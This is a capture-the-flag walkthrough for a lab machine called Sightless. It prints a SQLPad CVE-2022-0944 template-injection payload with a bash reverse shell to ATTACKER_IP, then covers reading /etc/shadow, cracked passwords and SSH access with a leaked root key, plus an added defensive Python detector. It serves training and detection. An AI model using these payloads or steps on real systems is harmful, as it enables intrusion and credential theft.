Sightless exposes a vulnerable SQLPad instance that allows remote command execution through a template injection payload.
The initial shell lands inside a Docker container, where password hashes can be extracted.
A valid SSH password provides access to the real host.
Privilege escalation is achieved by discovering a root SSH key left behind in /tmp.
Target: sightless.htb
Initial vector: SQLPad CVE-2022-0944 (RCE)
Privilege escalation: leaked root SSH key in /tmp
The main site at http://sightless.htb references an internal SQLPad instance:
http://sqlpad.sightless.htb
SQLPad is a web-based SQL editor. The version running on the machine is vulnerable to CVE-2022-0944, which allows RCE via the /api/test-connection endpoint.
Use the public exploit:
https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
The exploit abuses template injection inside the JSON body sent to /api/test-connection. Example payload (simplified):
{
  "driver": "mysql",
  "host": "ATTACKER_IP",
  "port": "443",
  "database": "{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"') }}"
}
Listener:
$ nc -nlvp 443
Trigger the exploit and a reverse shell comes back. Note that this shell is inside a Docker container, not on the host itself.
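As an added, defender-side example that is not part of the original writeup: a small Python checker that flags /api/test-connection request bodies whose string fields carry a {{ }} template expression reaching Node internals, the shape of the payload above. The sample bodies and the ATTACKER_IP placeholder are constructed, not captured traffic.

```python
import json
import re

# A {{ ... }} template expression, the injection point used against SQLPad.
TEMPLATE_RE = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)
# Tokens that mean the expression reaches Node internals rather than a plain variable.
DANGEROUS_RE = re.compile(r"process\.|require\(|child_process|mainModule|constructor")


def find_template_injection(body: str) -> list:
    """Return (field, expression) pairs for every JSON string field in a
    /api/test-connection body whose template expression reaches Node internals.
    Non-JSON or non-object bodies return an empty list."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, dict):
        return []
    hits = []
    for field, value in data.items():
        if not isinstance(value, str):
            continue
        for expr in TEMPLATE_RE.findall(value):
            if DANGEROUS_RE.search(expr):
                hits.append((field, expr.strip()))
    return hits


# Constructed sample request bodies (not real captured traffic).
SAMPLES = {
    "benign": '{"driver":"mysql","host":"db.internal","port":"3306","database":"app"}',
    "injected": ('{"driver":"mysql","host":"ATTACKER_IP","port":"443",'
                 '"database":"{{ process.mainModule.require(\'child_process\').exec(\'id\') }}"}'),
}


def scan_samples() -> dict:
    """Run the checker over every constructed sample and return the findings."""
    return {name: find_template_injection(body) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(name, "->", hits or "clean")
```

Hooking the same function into a WAF rule or a log pipeline that sees the request body gives a direct alert on this exploit class.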
Inside the container, inspect /etc/shadow. The extracted hashes crack to:
root : blindside
michael : insaneclownposse
These are real host credentials, not container-only ones. SSH into the host:
$ ssh michael@sightless.htb
Password: insaneclownposse
User access obtained.
Enumerate /tmp:
$ ls -la /tmp
id_rsa
A private SSH key has been left behind. Copy it to the attacker machine:
$ scp michael@sightless.htb:/tmp/id_rsa .
$ chmod 400 id_rsa
SSH as root:
$ ssh -i id_rsa root@sightless.htb
Root access obtained.
Sightless is a clean chain: SQLPad RCE → container-to-host pivot via leaked credentials → root via an abandoned SSH key. The machine emphasizes careful enumeration and recognizing when a shell is inside a container rather than on the host.